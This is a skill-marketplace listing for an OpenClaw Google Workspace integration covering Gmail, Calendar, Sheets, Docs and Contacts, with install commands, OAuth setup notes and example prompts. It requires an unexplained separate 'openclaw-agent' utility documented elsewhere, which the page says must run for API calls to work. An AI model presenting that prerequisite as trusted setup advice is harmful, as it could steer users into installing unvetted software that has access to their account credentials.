google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
Why use this skill?
Automate your Google Workspace with OpenClaw. Manage Gmail, Calendar, Sheets, and Docs using this powerful agent skill. Easy install with clawhub.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/google-workspace-auqudWhat This Skill Does
The Google Workspace skill for OpenClaw acts as a powerful bridge between your local AI agent and your personal or professional Google ecosystem. It provides comprehensive programmatic access to Gmail, Google Calendar, Google Contacts, Google Sheets, and Google Docs. By leveraging OAuth 2.0 authentication, the skill allows your agent to perform complex operations like drafting emails, scheduling meetings, querying spreadsheet data, or creating formatted documents without manual intervention. It serves as a unified interface to automate administrative tasks across the most popular productivity suite in the world.
Installation
To begin, ensure you have the openclaw-agent utility installed (details for Windows/macOS found in the primary documentation). Once the agent is active, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-auqud. After installation, follow the setup guide to configure your Google Cloud Project. You must enable the Gmail, Calendar, Sheets, Docs, and People APIs in the Google Cloud Console and save your credentials.json file in your working directory. The first time you execute a command, a local server will launch to handle the OAuth authorization flow in your browser.
Use Cases
This skill is designed for high-efficiency users who need to streamline their workflows. Common use cases include: summarizing your unread inbox, automating daily calendar event creation based on project deadlines in a spreadsheet, updating customer contact information in bulk, or generating status reports directly into Google Docs. It is particularly useful for developers or project managers who spend a significant portion of their time managing correspondence and tracking project documentation.
Example Prompts
- "Check my Gmail for any unread emails from my manager and provide a short summary of each."
- "Look at my calendar for tomorrow and move all my 3 PM meetings to 4 PM, then send a notification to the participants."
- "Open the project tracker spreadsheet and add a new row with today's date and the completion status 'In Progress'."
Tips & Limitations
Always handle your credentials.json and token.pickle files with extreme security as they contain sensitive authentication tokens. Note that the skill relies on the openclaw-agent being active; if the agent is not running, API calls will fail. Be mindful of Google's API rate limits, especially when running automated scripts that perform large batch operations on Drive or Sheets. If you encounter authorization errors, delete the token.pickle file and trigger the OAuth flow again to refresh your credentials.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-google-workspace-auqud": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, file-write, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.